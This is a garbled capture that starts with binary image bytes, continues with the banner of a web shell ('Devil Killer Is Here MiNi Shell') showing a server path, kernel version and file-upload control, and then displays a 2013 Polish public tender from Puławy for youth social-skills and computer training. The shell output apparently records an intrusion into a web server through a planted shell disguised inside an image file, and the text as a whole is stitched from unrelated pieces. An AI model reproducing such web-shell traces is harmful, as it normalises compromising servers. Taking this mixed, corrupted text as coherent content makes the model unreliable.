JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130510/183972-N-2013.html

<p class="kh_header"><b>Puławy: zorganizowanie i przeprowadzenie zajęć w ramach Programu aktywności lokalnej dla młodzieży powyżej 15 r.ż. zagrożonej wykluczeniem społecznym</b><br>
<b>Numer ogłoszenia: 183972 - 2013; data zamieszczenia: 10.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie , al. Królewska 3, 24-100 Puławy, woj. lubelskie, tel. 81888 04 92, faks 81888 04 92.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcpr.pulawy.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> Zamawiający nie przewiduje zastosowania dynamicznego systemu zakupów.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> zorganizowanie i przeprowadzenie zajęć w ramach Programu aktywności lokalnej dla młodzieży powyżej 15 r.ż. zagrożonej wykluczeniem społecznym.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia składa się z 2 części, tj.:
- Część 1 pn. Trening kompetencji i umiejętności społecznych,
- Część 2 pn. Szkolenie z zakresu obsługi komputera - grafika komputerowa.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0, 85.12.12.70-6, 55.11.00.00-4, 55.24.00.00-4, 80.53.31.00-0, 80.53.32.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Zamawiający dokona oceny spełniania warunku na podstawie złożonego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1 pn. Trening kompetencji i umiejętności społecznych z elementami autoprezentacji
Zamawiający uzna za spełniony warunek, jeżeli wykonawca wykaże, że - w okresie ostatnich  trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał,  a  w przypadku świadczeń okresowych lub  ciągłych również wykonuje, należycie co najmniej 3 usługi szkoleniowe w formie wyjazdowej z zapewnieniem zakwaterowania i wyżywienia o wartości brutto minimum 20.000,00 zł każda. 

Część 2 pn. Szkolenie z zakresu obsługi komputera - grafika komputerowa
Zamawiający uzna za spełniony warunek, jeżeli wykonawca wykaże, że - w okresie ostatnich  trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał,  a  w przypadku świadczeń okresowych lub  ciągłych również wykonuje, należycie co najmniej 3 usługi polegające na zorganizowaniu i przeprowadzeniu szkoleń lub kursów z zakresu grafiki komputerowej o wartości brutto minimum 7.000,00 zł każda.
Dla każdej z części zamawiający dokona oceny spełniania warunku na podstawie złożonych przez wykonawcę dokumentów i oświadczenia o spełnianiu warunków udziału w postępowaniu według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Zamawiający dokona oceny spełniania warunku na podstawie złożonego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Część 1 pn. Trening kompetencji i umiejętności społecznych z elementami autoprezentacji
Zamawiający uzna za spełniony ww. warunek, jeżeli wykonawca zapewni przy realizacji zamówienia udział minimum 7 osób tj.: 
- minimum 2 osób, z których każda posiadać ma co najmniej wykształcenie wyższe o kierunku psychologia oraz co najmniej 3-letnie doświadczenie zawodowe jako psycholog i aktualnie wykonuje zawód psychologa (do prowadzenia Treningu kompetencji i umiejętności społecznych z elementami autoprezentacji) oraz
- minimum 1 osoby, która będzie posiadać co najmniej wykształcenie wyższe oraz uprawnienia doradcy zawodowego (do prowadzenia Indywidualnego doradztwa zawodowego), i
- minimum 2 osób, z których każda posiadać ma wykształcenie co najmniej wyższe o kierunku medycyna lub wykształcenie co najmniej policealne o kierunku ratownik medyczny (do prowadzenia Kursu pierwszej pomocy przedmedycznej), oraz
- minimum 2 osób, z których każda z osobna posiadać ma co najmniej wykształcenie wyższe o kierunku pedagogika i uprawnienia wychowawcy kolonijnego lub co najmniej wykształcenie wyższe o kierunku psychologia i uprawnienia wychowawcy kolonijnego (do pełnienia funkcji opiekunów uczestników, w tym również koordynatora wyjazdu)

Część 2 pn. Szkolenie z zakresu obsługi komputera - grafika komputerowa
Zamawiający uzna za spełniony ww. warunek, jeżeli wykonawca zapewni przy realizacji zamówienia udział minimum 1 osoby, która ma posiadać wykształcenie co najmniej średnie z zakresu informatyki z przygotowaniem pedagogicznym lub co najmniej wykształcenie średnie z 2 - letnim doświadczeniem w prowadzeniu szkoleń z zakresu programu ADOBE Photoshop  Elements v. 11 PL Win Ret. Przez doświadczenie, o którym mowa należy rozumieć pozostawanie w stosunku pracy lub zlecenia z firmą bądź instytucją prowadzącą tego typu szkolenia lub kursy.
Dla każdej z części zamawiający dokona oceny spełniania warunku na podstawie złożonych przez wykonawcę dokumentów i oświadczenia o spełnianiu warunków udziału w postępowaniu według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Zamawiający dokona oceny spełniania warunku na podstawie złożonego przez wykonawcę oświadczenia o spełnianiu warunków udziału w postępowaniu, według formuły: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty wykonawcy, polegające na: a)zmianie terminu realizacji zamówienia, jednak w granicach czasowych określonych w SIWZ - w przypadku klęski żywiołowej lub gdy warunki atmosferyczne uniemożliwiają wykonanie zamówienia w terminie wynikającym z oferty, b)zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia którego strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwią wykonawcy wykonanie w części lub w całości jego zobowiązań, c)zmianie warunków płatności na rzecz wykonawcy na skutek zmian zawartej przez zamawiającego umowy o dofinansowanie projektu lub wytycznych instytucji wdrażającej dotyczących realizacji projektu, d)zmianie osób, przy pomocy których wykonawca realizować będzie zamówienie, wynikającej z ważnych przyczyn wskazanych przez wykonawcę, które nie mogły być wcześniej przewidziane, z zastrzeżeniem, że proponowane przez wykonawcę w to miejsce osoby będą spełniały warunki określone w SIWZ; zmiana taka nie wymaga aneksu do umowy lecz jedynie pisemnej zgody zamawiającego, e)zmianie miejsca realizacji usługi, z zastrzeżeniem że proponowane w zamian miejsce spełnia warunki określone w SIWZ, zmiana taka jest możliwa jedynie po uprzednim wyjaśnieniu i udokumentowaniu przez wykonawcę przyczyn dokonania zmiany, a przyczyny te nie leżą po stronie wykonawcy i nie mogły być wcześniej przez niego przewidziane, f)zmianie w zakresie podwykonawstwa wyłącznie w sytuacji gdy konieczność jej dokonania wynika z ważnych i niemożliwych wcześniej do przewidzenia przyczyn oraz jest niezbędna w celu prawidłowej realizacji przedmiotu zamówienia, przy czym dokonana przez wykonawcę zmiana w powyższym zakresie bez zgody zamawiającego może skutkować rozwiązaniem przez zamawiającego niniejszej umowy ze skutkiem natychmiastowym.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pcpr.pulawy.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowe Centrum Pomocy Rodzinie
al. Królewska 3
24-100 Puławy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2013 godzina 08:00, miejsce: Powiatowe Centrum Pomocy Rodzinie
sekretariat - pok. nr 1
al. Królewska 3
24-100 Puławy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> - Projekt systemowy Samodzielni - nie sami jest współfinansowany przez UE w ramach Priorytetu VII promocja integracji społecznej Działania 7.1 Rozwój i upowszechnianie aktywnej integracji Poddziałania 7.1.2 Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie Programu Operacyjnego Kapitał Ludzki.
- Zamawiający nie przewiduje zawarcia umowy ramowej ani udzielenia zamówień uzupełniających ani wyboru najkorzystniejszej oferty z zastosowaniem aukcji elektronicznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Trening kompetencji i umiejętności społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie i przeprowadzenie treningu kompetencji i umiejętności społecznych z elementami autoprezentacji wraz z indywidualnym doradztwem zawodowym a także kursem pierwszej pomocy przedmedycznej podczas 8 - dniowego wyjazdu dla 12 osób - uczestników programu łącznie z zakwaterowaniem, ubezpieczeniem od następstw nieszczęśliwych wypadków, wyżywieniem, dowozem z Puław do miejsca zakwaterowania i zapewnieniem powrotu.  

Uczestnicy programu to młodzież w wieku od 15 r.ż. do 18 r.ż. zagrożona wykluczeniem społecznym, patologią społeczną oraz z rodzin dysfunkcyjnych. Uczestnicy programu to 6 dziewcząt i 6 chłopców.
Liczba uczestników wyjazdu może ulec zmianie w granicach do 20% in minus.

1) Miejsce realizacji zamówienia:
Zamawiający zastrzega, aby miejscem realizacji zamówienia była miejscowość nadmorska Morza Bałtyckiego położona pomiędzy miastem Rewal a miastem Frombork, z uwzględnieniem obszarów tych miast, z zastrzeżeniem, że odległość ośrodka - w którym zakwaterowani będą uczestnicy - od morza nie może przekraczać 2 km.

2) Termin realizacji zamówienia:
Zamawiający zastrzega, że zamówienie ma być zrealizowane w okresie pomiędzy 1 lipca 2013r.
a 31 sierpnia 2013r.
3) Wymagany minimalny zakres tematyczny zajęć:
      3.1) Trening kompetencji i umiejętności społecznych z elementami autoprezentacji
    Zajęcia mają być prowadzone w formie zajęć grupowych, na których wykonawca ma   
    zrealizować poniższe zagadnienia tematyczne:
- profilaktyka uzależnień,
- radzenie sobie ze stresem,
- radzenie sobie z emocjami np. ze złością,
- asertywność na co dzień,
- podnoszenie poczucia własnej wartości,
- elementy socjoterapii grupowej
       3.2) Indywidualne doradztwo zawodowe
Zajęcia mają być prowadzone w formie indywidualnych rozmów z uczestnikami programu i     zakresem tematycznym obejmować wiedzę i kompetencje z zakresu doradztwa zawodowego dla młodzieży w wieku 15-18 lat.
       3.3) Kurs pierwszej pomocy przedmedycznej
Zajęcia mają być prowadzone w formie grupowej i obejmować swoimi zakresem   następujące     zagadnienia:
 - omówienie postępowania m.in. przy padaczce, utracie przytomności, zadławieniu, ranach  różnego rodzaju, nagłym zatrzymaniu krążenia lub oparzeniach, czyli takich schorzeniach i urazach, na jakie możemy natknąć się w życiu codziennym
- w trakcie kursu uczestnicy powinni nabyć wiedzę, jak zabezpieczyć miejsce wypadku, a także nabyć wiedzę z zakresu podstawowych elementów ratownictwa drogowego

4) Sposób prowadzenia szkolenia oraz czas trwania poszczególnych zajęć:
4.1) Trening kompetencji i umiejętności społecznych z elementami autoprezentacji
Zajęcia mają być realizowane przez wykonawcę w formie warsztatów grupowych. Uczestnicy programu stanowić będą jedną grupę.
Czas trwania treningu to łącznie 15 godzin zajęć dla grupy, przy czym 1 godzina treningu to 45 minut zajęć.
            4.2)  Indywidualne doradztwo zawodowe
Doradztwo zawodowe wykonawca ma zrealizować w formie indywidualnych rozmów z uczestnikami programu.
Czas trwania zajęć to łącznie 24 godziny, przy czym na każdego z uczestników programu ma przypadać po 2 godziny indywidualnych rozmów. 1 godzina doradztwa zawodowego to 45 minut rozmowy.
 	 4.3) Kurs pierwszej pomocy przedmedycznej
                    Zajęcia mają być prowadzone w formie szkolenia grupowego. Uczestnicy stanowić będą 
 	        jedną grupę.
        Czas trwania kursu to łącznie 3 godziny zajęć dla grupy, przy czym 1 godzina dydaktyczna  
        szkolenia to 45 minut zegarowych.

5) Wymagane minimalne kwalifikacje kadry prowadzącej zajęcia: 
5.1) Trening kompetencji i umiejętności społecznych z elementami autoprezentacji
Zajęcia powyższe mają być prowadzone przez minimum 2 osoby jednocześnie, z których każda posiadać ma co najmniej wykształcenie wyższe o kierunku psychologia oraz co najmniej 3-letnie doświadczenie zawodowe jako psycholog i aktualnie wykonuje zawód psychologa.
5.2)  Indywidualne doradztwo zawodowe
Zajęcia mają być prowadzone przez minimum 1 osobę, która będzie posiadać co najmniej wykształcenie wyższe oraz uprawnienia doradcy zawodowego.


5.3)  Kurs pierwszej pomocy przedmedycznej 
Szkolenie ma być prowadzone jednocześnie przez minimum 2 osoby, z których każda z osobna posiadać ma co najmniej wykształcenie wyższe o kierunku medycyna lub co najmniej wykształcenie policealne o kierunku ratownik medyczny.

6) Inne wymagania jakie ma spełnić wykonawca przy realizacji przedmiotu zamówienia: 
Wykonawca ma zapewnić oraz wliczyć w koszt zamówienia dla wszystkich uczestników wyjazdu:
6.1)	transport busem uczestników programu z Puław do miejsca zakwaterowania oraz przywóz uczestników do Puław, bus ma być wyposażony w sprawną klimatyzację,
6.2)	transport w przypadku gdy odległość od miejsca zakwaterowania do miejsca, 
w którym odbywać się będą zajęcia przekracza 2 km,
6.3)	suchy prowiant dla uczestników programu na czas powrotu do Puław,
6.4)	pełne wyżywienie (3 posiłki dziennie tj. śniadanie, obiad- składający się z min. 2 dań, kolacja) dla wszystkich uczestników programu, przy czym pierwszego dnia tj. w dniu wyjazdu z Puław wykonawca zapewnić ma dla uczestników kolację, natomiast ostatniego dnia tj. w dniu powrotu do Puław wykonawca zapewnić ma dla uczestników śniadanie;
6.5)	bazę noclegową:
 - zakwaterowanie uczestników programu w domu wczasowym, pensjonacie lub w hotelu - w jednym budynku,
	- zakwaterowanie uczestników w pokojach 2, 3 osobowych z podziałem na płeć;
	- wszystkie pokoje mają być z pełnym węzłem sanitarnym (łazienka i toaleta),
- szklanki w pokojach dla uczestników oraz po 1 litrze dziennie wody mineralnej gazowanej na uczestnika;
6.6)	opłatę klimatyczną, miejscową i inną związaną z pobytem uczestników programu za cały okres pobytu za wszystkich uczestników, jeśli jest wymagana;
6.7)	materiały biurowe dla każdego uczestnika tj. po 1 notatniku A-4, po 1 długopisie, po 1 teczce plastikowej na gumkę, które po zakończeniu szkolenia stają się własnością uczestników.
	Wszystkie materiały wydane uczestnikom winny być oznaczone logo PCPR w Puławach, UE, EFS i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego (logo PCPR w Puławach) i na stronie internetowej www.wup.lublin.pl (pozostałe logotypy);
6.8)	podczas treningu umiejętności i kompetencji społecznych z elementami autoprezentacji oraz szkolenia z zakresu pierwszej pomocy dla każdego uczestnika zajęć wykonawca zapewnić ma: napoje (tj. co najmniej - herbatę, soki owocowe, wodę mineralną) cukier, ciastka, owoce;
6.9)	ubezpieczenie wszystkich uczestników od następstw nieszczęśliwych wypadków na czas całego wyjazdu (tj. łącznie z podróżą);
6.10)	dostęp do opieki medycznej tzn. zapewnienie przez wykonawcę dowozu uczestnika do   przychodni zdrowia - w przypadku wystąpienia potrzeby udzielenia pomocy lekarskiej lub pielęgniarskiej, a także dostępu do apteczki;
